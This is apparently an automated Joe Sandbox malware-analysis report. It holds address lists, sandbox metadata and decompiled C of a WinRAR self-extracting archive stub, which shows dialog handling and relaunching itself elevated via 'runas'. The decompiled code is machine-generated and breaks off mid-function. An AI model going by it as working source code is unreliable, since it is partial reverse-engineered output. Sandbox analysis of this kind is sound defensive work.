0x000689e8
0x00068a81
0x00068a81
0x00068a85
0x00068a8b
0x00068a90
0x00068a96
0x00068a9b
0x00068aa1
0x00068aa8
0x00068aad
0x00068aae
0x00068ab0
0x00068b43
0x00068b45
0x00068b4a
0x00068b4c
0x00068b9e
0x00068ba1
0x00068ba3
0x00068bc7
0x00068bca
0x00068bca
0x00068bd1
0x00068c09
0x00068c0b
0x000691d2
0x000691d2
0x000691d6
0x000691dc
0x000691e1
0x000691e5
0x000691e8
0x000691eb
0x000691ed
0x000691ed
0x000691ed
0x000691ed
0x000691f3
0x000691f3
0x000691f7
0x00000000
0x00000000
0x000691f9
0x000691fb
0x00068665
0x00068665
0x00000000
0x00068665
0x00069201
0x00069207
0x00069215
0x00069217
0x00000000
0x00000000
0x00000000
0x00069217
0x00069209
0x0006920b
0x00000000
0x0006920b
0x00068c11
0x00068c11
0x00068c14
0x00068c1b
0x00068c2d
0x00068c2d
0x00068c30
0x00068c32
0x00068c79
0x00068c79
0x00068c7d
0x00068c7f
0x00068c87
0x00068c87
0x00068c9b
0x00068ca1
0x00068ca7
0x00068cad
0x00068cbe
0x00068cd4
0x00068cdf
0x00068ce8
0x00068ceb
0x00068cf2
0x00068cf8
0x00068cfd
0x00068d00
0x00068d02
0x00068d05
0x00068d08
0x00068d0b
0x00068d0e
0x00068d11
0x00068d13
0x00068db6
0x00068db6
0x00068db9
0x00068dc0
0x00068dc7
0x00068dcb
0x00068de1
0x00068de3
0x00068de3
0x00068de4
0x00068de4
0x00068de8
0x00068deb
0x00068dee
0x00068df1
0x00068efd
0x00068f04
0x00068f06
0x00068f0d
0x00068f37
0x00068f3c
0x00068f4e
0x00068f54
0x00068f56
0x00068f5c
0x00068f76
0x00068f0f
0x00068f0f
0x00068f15
0x00068f1b
0x00068f1c
0x00068f1c
0x00068f0d
0x00068f7b
0x00068f7d
0x00068f82
0x00068f89
0x00068fbb
0x00068fbb
0x00068fbb
0x00068fbd
0x00068fbf
0x00068fbf
0x00068fc6
0x00068fd0
0x00068fd7
0x00068ff6
0x00068ff6
0x00068ffa
0x00068ffd
0x0006905e
0x0006905e
0x00069062
0x00069065
0x00069078
0x00069078
0x00069078
0x0006907a
0x0006907a
0x0006907e
0x00000000
0x00000000
0x00069084
0x00069087
0x0006908b
0x00069097
0x00069097
0x0006909b
0x000690b6
0x000690b6
0x000690b8
0x000690cd
0x000690cd
0x000690cf
0x00069193
0x00069193
0x00069196
0x0006919d
0x000691a5
0x000691ac
0x000691b1
0x000691b3
0x000691c6
0x000691c6
0x000691b3
0x000691cb
0x00000000
0x000691cb
0x000690d5
0x000690da
0x000690dc
0x000690df
0x000690e5
0x000690e5
0x000690e7
0x000690f9
0x000690f9
0x000690ff
0x00069104
0x00069107
0x0006910d
0x00069121
0x00069128
0x0006913b
0x0006913d
0x00069146
0x0006914b
0x00069151
0x00069160
0x00069173
0x00069186
0x00069188
0x0006918b
0x00069190
0x00000000
0x00069190
0x000690e9
0x000690ef
0x00000000
0x00000000
0x000690f1
0x000690f7
0x00000000
0x00000000
0x00000000
0x000690f7
0x000690e1
0x000690e3
0x00000000
0x00000000
0x00000000
0x000690e3
0x000690ba
0x000690bd
0x000690c4
0x00000000
0x00000000
0x000690ca
0x00000000
0x000690ca
0x0006909d
0x0006909f
0x00000000
0x00000000
0x000690a1
0x000690a8
0x00000000
0x00000000
0x000690ae
0x000690b0
0x00000000
0x00000000
0x00000000
0x000690b0
0x0006908d
0x00069091
0x00000000
0x00000000
0x00000000
0x00069091
0x00069067
0x0006906e
0x00000000
0x00000000
0x00069070
0x00069072
0x00000000
0x00000000
0x00069074
0x00000000
0x00069074
0x00068fff
0x00069003
0x00000000
0x00000000
0x00069005
0x00069007
0x00000000
0x00000000
0x00069009
0x0006900f
0x00069039
0x00069039
0x00069043
0x00069044
0x00069046
0x00069046
0x00069052
0x00069056
0x0006905b
0x00000000
0x0006905b
0x00069011
0x00069017
0x00069021
0x00069021
0x00069028
0x00000000
0x00000000
0x0006902a
0x00069034
0x00069035
0x00000000
0x00069035
0x00069019
0x0006901f
0x00000000
0x00000000
0x00000000
0x0006901f
0x00068fd9
0x00068fdf
0x00000000
0x00000000
0x00068fe1
0x00068feb
0x00068feb
0x00068fed
0x00068fef
0x00068fef
0x00000000
0x00068fed
0x00068fe3
0x00068fe9
0x00000000
0x00000000
0x00000000
0x00068fe9
0x00068fc8
0x00000000
0x00068fc8
0x00068fa0
0x00068fac
0x00068fb1
0x00068fb3
0x00000000
0x00000000
0x00068fb5
0x00068fb7
0x00000000
0x00068fb7
0x00068df7
0x00068dfd
0x00068e00
0x00068e69
0x00068e69
0x00068e6e
0x00068e7f
0x00068e84
0x00068e87
0x00068e89
0x00068ed6
0x00068ed6
0x00068ed9
0x00068ed9
0x00068ee0
0x00068e35
0x00068e35
0x00068e37
0x00068ef3
0x00068ef3
0x00068ef3
0x00068ef5
0x00068ef5
0x00000000
0x00068ef5
0x00068e3d
0x00068e3d
0x00068e3f
0x00000000
0x00000000
0x00068e47
0x00000000
0x00068e47
0x00068ee6
0x00068ee8
0x00000000
0x00000000
0x00068e31
0x00068e31
0x00000000
0x00068e31
0x00068e8b
0x00068e93
0x00000000
0x00000000
0x00068e95
0x00068e9b
0x00068ea7
0x00068ea8
0x00068eab
0x00068eb9
0x00068eba
0x00068ec1
0x00068ead
0x00068ead
0x00068ead
0x00068ec6
0x00068ec6
0x00068ec9
0x00068ecb
0x00068e2e
0x00068e2e
0x00000000
0x00068e2e
0x00068ed1
0x00000000
0x00068ed1
0x00068e02
0x00068e05
0x00000000
0x00000000
0x00068e07
0x00068e09
0x00068e4d
0x00068e4d
0x00068e4f
0x00000000
0x00000000
0x00068e5b
0x00068e62
0x00000000
0x00068e62
0x00068e0b
0x00068e0e
0x00000000
0x00000000
0x00068e10
0x00068e13
0x00000000
0x00000000
0x00068e22
0x00068e27
0x00068e29
0x00068e2b
0x00000000
0x00068e2b
0x00068dcd
0x00068dcf
0x00000000
0x00000000
0x00068dd3
0x00068dd4
0x00068dd8
0x00000000
0x00000000
0x00068ddc
0x00068ddd
0x00000000
0x00068ddd
0x00068d19
0x00068d1f
0x00000000
0x00000000
0x00068d25
0x00068d2b
0x00068d31
0x00068d33
0x00068db3
0x00068db3
0x00000000
0x00068db3
0x00068d35
0x00068d3f
0x00068d3f
0x00068d4f
0x00068d52
0x00068d54
0x00068dae
0x00068dae
0x00068db1
0x00068db1
0x00000000
0x00068db1
0x00068d56
0x00068d5c
0x00068d5e
0x00068d60
0x00068d85
0x00068d8b
0x00068d97
0x00068da2
0x00068dab
0x00000000
0x00068dab
0x00068d62
0x00068d6c
0x00068d6e
0x00068d73
0x00068d79
0x00000000
0x00000000
0x00068d7b
0x00000000
0x00000000
0x00068d7d
0x00068d83
0x00000000
0x00000000
0x00000000
0x00068d83
0x00068d64
0x00068d6a
0x00000000
0x00000000
0x00000000
0x00068d6a
0x00068d58
0x00068d5a
0x00000000
0x00000000
0x00000000
0x00068d5a
0x00068d37
0x00068d3d
0x00000000
0x00000000
0x00000000
0x00068d3d
0x00068c81
0x00068c81
0x00068c81
0x00068c81
0x00000000
0x00068c81
0x00068c38
0x00068c3b
0x00068c3c
0x00068c3f
0x00068c41
0x00068c4c
0x00068c4e
0x00068c5d
0x00068c6f
0x00068c6f
0x00068c4e
0x00000000
0x00068c3f
0x00068c1d
0x00068c24
0x00068c2b
0x00068c76
0x00000000
0x00068c76
0x00000000
0x00068c2b
0x00068bd7
0x00068bda
0x00068be1
0x00068be8
0x00068bed
0x00068bef
0x00000000
0x00000000
0x00068bf1
0x00068bf3
0x00068bf6
0x00068bf6
0x00068bfc
0x00068c01
0x00000000
0x00068c01
0x00068ba5
0x00068bae
0x00068baf
0x00068bb4
0x00068bb7
0x00068bb9
0x00068bc1
0x00068bc1
0x00068bc3
0x00000000
0x00000000
0x00000000
0x00068bc5
0x00068b4e
0x00068b52
0x00068b58
0x00068b5b
0x00068b5f
0x00068b67
0x00068b68
0x00068b6b
0x00068b73
0x00068b74
0x00068b77
0x00068b79
0x00068b7f
0x00068b85
0x00068b87
0x00068b8d
0x00068b94
0x00068b97
0x00068b97
0x00068b85
0x00068b77
0x00068b6b
0x00068b5f
0x00000000
0x00068b52
0x00068ab6
0x00068ab9
0x00000000
0x00000000
0x00068abf
0x00068ac2
0x00068ac5
0x00068ac7
0x00000000
0x00000000
0x00068acd
0x00068ad0
0x00000000
0x00000000
0x00068ad6
0x00068ad9
0x00068ae0
0x00000000
0x00000000
0x00068ae8
0x00068af2
0x00068af7
0x00068af9
0x00068b30
0x00068b30
0x00068b34
0x00068bbe
0x00000000
0x00068bbe
0x00068b3a
0x00068b3c
0x00068b3e
0x00000000
0x00068b3e
0x00068afb
0x00068aff
0x00000000
0x00000000
0x00068b01
0x00068b09
0x00068b0a
0x00068b11
0x00068b2b
0x00000000
0x00068b2b
0x000689ee
0x000689f5
0x00000000
0x00000000
0x000689fd
0x00068a08
0x00068a0d
0x00068a10
0x00068a12
0x00000000
0x00000000
0x00068a14
0x00068a1b
0x00000000
0x00000000
0x00068a1d
0x00068a24
0x00068a2e
0x00068a2f
0x00068a69
0x00068a6b
0x00068a77
0x00068a7c
0x00068a7e
0x00000000
0x00068a7e
0x00068a31
0x00068a36
0x00068a44
0x00068a49
0x00068a4d
0x00068a53
0x00068a53
0x00068961
0x00068946
0x0006894d
0x00068952
0x00068959
0x00000000
0x00068959
0x000688eb
0x000688f1
0x000688f6
0x000688f8
0x00000000
0x00000000
0x000688fa
0x00068901
0x00068913
0x00068915
0x00000000
0x00068915
0x00068904
0x0006890a
0x0006890f
0x00068911
0x00000000
0x00000000
0x00000000
0x00068911
0x000688ba
0x000688bd
0x00000000
0x00000000
0x00000000
0x000688bd
0x000688ac
0x000688b3
0x00000000
0x00000000
0x00000000
0x000688b3
0x0006887c
0x00068883
0x00000000
0x00000000
0x00068885
0x00068889
0x0006888f
0x00000000
0x00000000
0x00000000
0x0006888f
0x0006882d
0x00068830
0x00068832
0x00000000
0x00000000
0x00000000
0x00068832
0x00068804
0x0006880a
0x0006880d
0x00068810
0x00068812
0x00000000
0x00068818
0x00068818
0x00068818
0x00000000
0x00068818
0x00068812
0x000686cd
0x000686d3
0x00000000
0x00000000
0x000686d5
0x000686dc
0x00000000
0x00000000
0x00000000
0x000686dc
0x000686a6
0x000686b0
0x000686b0
0x000686b6
0x00000000
0x000686b6
0x000686a8
0x000686ae
0x00000000
0x00000000
0x00000000
0x000686ae
0x00068688
0x00068692
0x00068692
0x00068698
0x00000000
0x00068698
0x0006868a
0x00068690
0x00000000
0x00000000
0x00000000
0x00068690
0x000685e7
0x000685ea
0x00068609
0x00068609
0x0006860c
0x00000000
0x00000000
0x00068612
0x00068619
0x00000000
0x00000000
0x00068624
0x00068625
0x00068629
0x0006862a
0x0006862b
0x00068630
0x00068632
0x00068647
0x0006865b
0x00068663
0x00000000
0x00068634
0x0006863b
0x00000000
0x0006863b
0x00068632
0x000685ec
0x000685f3
0x00000000
0x000685f9
0x00068604
0x00000000
0x00068604
0x000685f3
0x000685b0
0x000685ce
0x000685ce
0x00000000
0x000685ce
0x000685b2
0x000685b3
0x000685b7
0x000685b8
0x000685c0
0x000685d5
0x000685d5
0x00000000
0x000685c2
0x000685c9
0x00000000
0x000685c9

APIs

__EH_prolog.LIBCMT ref: 00068580
_memcmp.LIBVCRUNTIME ref: 00068A08

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: c27f429e913221eec686b627bc674c10ee5a77fc6a9470388ccffa5788b4ccbe
Instruction ID: ec2758cc7b5403428ca5dac4f5fed3dc30dfa7eb7eeac0b34e2b2bd927a0932b
Opcode Fuzzy Hash: c27f429e913221eec686b627bc674c10ee5a77fc6a9470388ccffa5788b4ccbe
Instruction Fuzzy Hash: 33821B70904245AEDF65DF64C895BFEB7FBAF05300F0882BAE9599B143DB315A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0007F063 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007F063() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0007F070); // executed
				return _t1;
			}

0x0007f068
0x0007f06e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F070,0007EAC5), ref: 0007F068

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4dbcdd14f90fa6480a9a5a6dd122e28b2a4f5eb1314b291555d49d379dd24285
Instruction ID: 93f87b4476d75d243022827728da5e91cc42d3c65f04c903f55b48872376a840
Opcode Fuzzy Hash: 4dbcdd14f90fa6480a9a5a6dd122e28b2a4f5eb1314b291555d49d379dd24285
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0007AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0007AEE0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E0007E28C(E0009203E, _t320);
				E0007E360();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E0006130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E0007CD2E(_t287, _t301, __eflags, __fp0);
						_t105 =  *0xac574;
						_t279 = 1;
						 *0xa844c = _t304;
						 *0xa8458 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xb6b7c;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00079DA4(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0xaa472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0xaa472;
						if( *0xaa472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E0007A2C7(_t309); // executed
						_push(0xa843c);
						_push(0xa8438);
						_push(0xbdc90);
						_push(_t304);
						 *0xa8463 = 0; // executed
						_t114 = E0007A7C3(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xa8452 = _t279;
						}
						__eflags =  *0xa843c;
						if( *0xa843c > 0) {
							_push(7);
							_push( *0xa8438);
							_push(_t304);
							E0007BDF5(_t301);
						}
						__eflags =  *0xbec98;
						if( *0xbec98 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E0006DDD1(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E0006DDD1(_t288, 0xbe));
						}
						__eflags =  *0xa843c;
						if( *0xa843c <= 0) {
							L103:
							__eflags =  *0xa8463;
							if( *0xa8463 != 0) {
								L114:
								__eflags =  *0xaa46c - 2;
								if( *0xaa46c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0xa9468;
								if( *0xa9468 != 0) {
									E000612C8(_t304, 0x67, 0);
									E000612C8(_t304, 0x66, 0);
								}
								_t115 =  *0xaa46c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xa8450;
									if( *0xa8450 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0xc20a4();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xa8452;
								if( *0xa8452 != 0) {
									SetDlgItemTextW(_t304, _t279, E0006DDD1(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xbdc84;
							if( *0xbdc84 != 0) {
								goto L114;
							}
							__eflags =  *0xaa46c;
							if( *0xaa46c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x969c)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E0006FE2E(__eflags, _t320 - 0x969c, " ", 0x2000);
										E0006FE2E(__eflags, _t320 - 0x969c, E0006DDD1(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0xbec98;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xbec98;
								if( *0xbec98 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0xa8440; // 0x0
							E00079635(_t288, __eflags,  *0xa0ed4,  *(_t320 - 0x14), _t320 - 0x969c, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0xa8438);
							_push(_t304); // executed
							E0007BDF5(_t301); // executed
							_t133 =  *0xbdc84;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xaa46c;
								if(__eflags == 0) {
									_t290 =  *0xa8440; // 0x0
									E00079635(_t290, __eflags,  *0xa0ed4,  *(_t320 - 0x14), _t133, 0, 0);
									L000835CE( *0xbdc84);
									_pop(_t288);
								}
							}
							__eflags =  *0xaa46c - _t279;
							if( *0xaa46c == _t279) {
								L102:
								_push(_t279);
								_push( *0xa8438);
								_push(_t304);
								E0007BDF5(_t301);
								goto L103;
							} else {
								 *0xc20c4(_t304);
								__eflags =  *0xaa46c - _t279;
								if( *0xaa46c == _t279) {
									goto L102;
								}
								__eflags =  *0xaa471;
								if( *0xaa471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xa8438);
								_push(_t304);
								E0007BDF5(_t301);
								__eflags =  *0xbec90;
								if( *0xbec90 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xa0ed4, L"LICENSEDLG", 0, E0007ACD0, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xa8450 = _t279;
									L26:
									_push(_t279);
									L13:
									EndDialog(_t304, ??); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xa8451;
						if( *0xa8451 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0xa8451;
							if( *0xa8451 == 0) {
								__eflags =  *0xa8452;
								if( *0xa8452 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0xa845c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0x935b4);
									}
									SetFocus(_t313);
									__eflags =  *0xa9468;
									if( *0xa9468 == 0) {
										_t314 = 0x800;
										E0006FE56(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E0007CAD9(_t287, _t320 - 0x1174, 0x800);
										E0006400A(_t320 - 0x429c, 0x880, E0006DDD1(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x429c);
										_push(0);
										E0007CB5A();
									} else {
										_push(E0006DDD1(_t287, 0xba));
										_push(0);
										E0007CB5A();
										_t314 = 0x800;
									}
									__eflags =  *0xaa471;
									if( *0xaa471 == 0) {
										E0007D1F2(_t320 - 0x2174);
									}
									_push(0);
									_push(_t320 - 0x2174);
									 *(_t320 - 0xe) = 0;
									_t166 = E0006A04F(0, _t320);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E0007A322(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0xaa471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0xa8454 = _t279;
													E000612E6(_t304, 0x67, 0);
													E000612E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E0006DDD1(_t287, 0xe6)); // executed
													E000612E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0x935b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xa8438);
													_push(_t304);
													E0007BDF5(_t302);
													_push(2);
													_push( *0xa8438);
													_push(_t304);
													E0007BDF5(_t302);
													_push(0xbdc90);
													_push(_t304);
													 *0xc0cb4 = _t279; // executed
													E0007D0F5(_t287, __eflags); // executed
													_push(6);
													_push( *0xa8438);
													 *0xc0cb4 = 0;
													_push(_t304);
													E0007BDF5(_t302);
													__eflags =  *0xa8450;
													if( *0xa8450 == 0) {
														__eflags =  *0xa845c;
														if( *0xa845c == 0) {
															__eflags =  *0xbeca4;
															if( *0xbeca4 == 0) {
																_push(4);
																_push( *0xa8438);
																_push(_t304); // executed
																E0007BDF5(_t302); // executed
															}
														}
													}
													E000612C8(_t304, _t279, _t279);
													 *0xa8454 =  *0xa8454 & 0x00000000;
													__eflags =  *0xa8454;
													_t182 =  *0xa8450; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E0006DDD1(_t287, 0x9a));
														E0006400A(_t320 - 0x569c, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E00066FC6(0xa0f50, _t279);
														E00079F35(_t304, _t320 - 0x569c, E0006DDD1(0xa0f50, 0x96), 0x30);
														 *0xa845c =  *0xa845c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0xac472;
												E0006EB3A(0xac472, _t320 - 0x174, 0x80);
												_push(0xab472);
												E0006400A(_t320 - 0x11cb4, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb4;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0xa8468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0xb6b80 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0006FE56(0xb6b82, _t231, 0x2000);
													}
													E0007AB2E(_t287, 0xbab82, 7);
													E0007AB2E(_t287, 0xbbb82, 2);
													E0007AB2E(_t287, 0xbcb82, 0x10);
													 *0xbdc83 = _t279;
													_t287 = 0xbdb82;
													E0006ECAD(_t279, 0xbdb82, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0007F4B0(_t238, 0xb6b80, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E0006ECF8(_t320 - 0x174, 0x80);
												E0006ECF8(_t320 - 0x11cb4, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0xc20a8( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xbeca4 =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E0006400A(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E00069619(_t320 - 0x319c);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E0006971E(_t320 - 0x319c);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00069653(_t320 - 0x319c, _t314); // executed
											_t287 =  *0xaa471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0xa8450 = 1;
									L75:
									__eflags =  *0xa845c;
									if( *0xa845c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xa8451 = _t279;
									SetDlgItemTextW(_t304, _t279, E0006DDD1(_t287, 0x90));
									_t292 =  *0xa0f50; // 0x0
									__eflags = _t292 - 9;
